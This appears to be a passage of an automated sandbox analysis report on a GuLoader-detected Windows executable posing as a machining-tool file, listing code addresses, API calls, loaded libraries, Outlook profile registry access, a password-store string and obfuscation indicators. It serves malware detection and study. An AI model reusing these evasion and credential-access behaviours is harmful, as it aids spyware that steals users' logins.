Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8C178 11_2_38C8C178
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C84908 11_2_38C84908
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C87508 11_2_38C87508
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8CB09 11_2_38C8CB09
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8E300 11_2_38C8E300
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8A000 11_2_38C8A000
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C82907 11_2_38C82907
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C82918 11_2_38C82918
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8CB18 11_2_38C8CB18
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C88818 11_2_38C88818
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C81710 11_2_38C81710
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8A010 11_2_38C8A010
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8F610 11_2_38C8F610
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C80012 11_2_38C80012
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C85228 11_2_38C85228
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C88828 11_2_38C88828
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C83228 11_2_38C83228
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8DE29 11_2_38C8DE29
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8F620 11_2_38C8F620
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8B321 11_2_38C8B321
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C85222 11_2_38C85222
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C83238 11_2_38C83238
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8DE38 11_2_38C8DE38
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C85B38 11_2_38C85B38
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C89B38 11_2_38C89B38
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8B330 11_2_38C8B330
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C87031 11_2_38C87031
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAF668 11_2_38CAF668
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA1828 11_2_38CA1828
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAF988 11_2_38CAF988
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA7FA8 11_2_38CA7FA8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAB4C8 11_2_38CAB4C8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA82C8 11_2_38CA82C8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAE6C8 11_2_38CAE6C8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA82C0 11_2_38CA82C0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAD0E8 11_2_38CAD0E8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA9EE8 11_2_38CA9EE8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA04F8 11_2_38CA04F8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CABAF9 11_2_38CABAF9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAECF9 11_2_38CAECF9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA88FE 11_2_38CA88FE
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAE088 11_2_38CAE088
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAAE88 11_2_38CAAE88
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA0E98 11_2_38CA0E98
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA9898 11_2_38CA9898
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CACA98 11_2_38CACA98
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA0E92 11_2_38CA0E92
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAFCA8 11_2_38CAFCA8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CACAA8 11_2_38CACAA8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA98A8 11_2_38CA98A8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAE6BB 11_2_38CAE6BB
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAA848 11_2_38CAA848
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CADA48 11_2_38CADA48
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA0040 11_2_38CA0040
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CADA40 11_2_38CADA40
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA9258 11_2_38CA9258
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAC457 11_2_38CAC457
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAC468 11_2_38CAC468
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: String function: 00402A3A appears 52 times
Sample file is different than original file name gathered from version info
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamefreedoms solitrringenes.exeDVarFileInfo$ vs SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.0000000070CBB000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamefreedoms solitrringenes.exeDVarFileInfo$ vs SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Uses 32bit PE files
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/9@5/5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004030D9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 11_2_004030D9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00404320 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404320
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_0040205E LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk, 0_2_0040205E
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File created: C:\Users\user\falden Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Mutant created: NULL
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File created: C:\Users\user\AppData\Local\Temp\nss2FBA.tmp Jump to behavior
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036406000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File read: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe" Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File written: C:\Users\user\hanknsordet.ini Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Windows.Forms.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.1494958612.000000000597D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1493431079.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1493431079.0000000000515000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 8984, type: MEMORYSTR
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_10002D20 push eax; ret 0_2_10002D4E
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
